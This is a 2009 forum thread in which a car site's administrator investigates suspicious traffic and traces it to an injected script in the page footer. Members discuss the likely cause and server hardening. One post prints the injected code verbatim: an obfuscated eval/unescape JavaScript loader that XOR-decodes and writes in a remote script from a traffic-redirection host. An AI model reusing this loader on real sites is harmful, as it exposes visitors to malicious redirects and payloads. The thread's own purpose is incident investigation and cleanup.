Page 1 of 1
http://inout.ru - Should I be worried?
Posted: Sun Jan 11, 2009 8:40 pm
by dubbers
Noticed whilst the pages were refreshing (slowly) that there was a lot of traffic going to the above webpage (ad provider?). Is this likely to be a hijack of the site?
The whois info looks harmless enough, and the website (above) doesnt look too dodgy. But have the russians become ad providers for rs246?
Re: http://inout.ru - Should I be worried?
Posted: Mon Jan 12, 2009 12:32 pm
by PhilT
dubbers wrote:Noticed whilst the pages were refreshing (slowly) that there was a lot of traffic going to the above webpage (ad provider?). Is this likely to be a hijack of the site?
This is the third report of suspicious urls when surfing the site. As far as I can tell the site is secure, so this points the finger at external content (Only GoogleAds, and Audi).
dubbers wrote:The whois info looks harmless enough, and the website (above) doesnt look too dodgy. But have the russians become ad providers for rs246?
The only way this is possible is if Google has linked through.
What I would suggest is to minimise the Google Ads by clicking this icon at the top of the content
If anybody sees any activity that they are not comfortable with, please email screenshots, logs, etc to
crew@rs246.com.[/img]
Re: http://inout.ru - Should I be worried?
Posted: Mon Jan 12, 2009 4:23 pm
by PhilT
PhilT wrote:dubbers wrote:Noticed whilst the pages were refreshing (slowly) that there was a lot of traffic going to the above webpage (ad provider?). Is this likely to be a hijack of the site?
This is the third report of suspicious urls when surfing the site. As far as I can tell the site is secure, so this points the finger at external content (Only GoogleAds, and Audi).
dubbers wrote:The whois info looks harmless enough, and the website (above) doesnt look too dodgy. But have the russians become ad providers for rs246?
The only way this is possible is if Google has linked through.
What I would suggest is to minimise the Google Ads by clicking this icon at the top of the content
If anybody sees any activity that they are not comfortable with, please email screenshots, logs, etc to
crew@rs246.com.[/img]
Well, I was wrong. I found the source of the issue, and trying to figure out how it got in.
I know some of you out there are savvy with this, so any feedback appreciated on how this managed to get embedded into the page footer:
Code: Select all
<script Language="JavaScript">eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%30%3B%69%3C%3D%73%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%7B%63%3D%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%3B%69%66%28%63%3C%31%32%38%29%63%3D%63%5E%34%3B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));d("8wgvmtp$hejcqeca9&NereWgvmtp&:rev$lpih$9$##?lpih$/9$#8wgv#$/$#mtp$hejcqeca9&NereWgvmtp&$#?lpih$/9$#wvg9&lppt>++`mwt)#$/$Iepl*vkqj`,5$/$Iepl*vej`ki,-$.$0-?lpih$/9$#*vmglpvebbmg*vq+p`w*nw&:8+wgv#$/$#mtp:#?`kgqiajp*svmpa,lpih-?8+wgvmtp:");</script>
RE: Re: http://inout.ru - Should I be worried?
Posted: Mon Jan 12, 2009 4:59 pm
by Nige_RS4
Take a read of this post Phil ...
http://www.jaguarpc.com/forums/showthre ... 067&page=4
You should check ALL index.html, default.php & index.php files for this code.
It suggests your server security has been compromised by a hacker - usually by injecting scripts over FTP?
One of the ISP's I deal with got hacked (over 300 sites were taken down / affected). They implemented SuPHP within a few days to try and restrict this happening again.
RE: Re: http://inout.ru - Should I be worried?
Posted: Mon Jan 12, 2009 6:15 pm
by Nige_RS4
RE: Re: http://inout.ru - Should I be worried?
Posted: Mon Jan 12, 2009 9:05 pm
by PhilT
That's what I don't understand.... We only allow http through the firewall.
I'm trawling the logs to see if I can find the injection.
RE: Re: http://inout.ru - Should I be worried?
Posted: Tue Jan 13, 2009 12:29 am
by PhilT
Well I found it. The good news is that the only activity that occured was the injection into the footer.
The good news is I've figured out what it is doing, and have taken steps to limit it happening again. I've yet to find the root cause.
RE: Re: http://inout.ru - Should I be worried?
Posted: Tue Jan 13, 2009 12:33 am
by PhilT
Happened on Christmas day, feckers!!
On Dec 25, 2008 at 06:04 PM the PostNuke code has detected that somebody tried to send information to your site that may have been intended as a hack.
RE: Re: http://inout.ru - Should I be worried?
Posted: Mon Jan 19, 2009 1:31 am
by PhilT
Just to let you know that this is now fixed... The code has been fixed.
RE: Re: http://inout.ru - Should I be worried?
Posted: Mon Jan 19, 2009 6:00 pm
by PhilT
To try to minimise further risk, I'm working through some upgrades:
Forum - Done
Gallery - Done
CMS - Pending
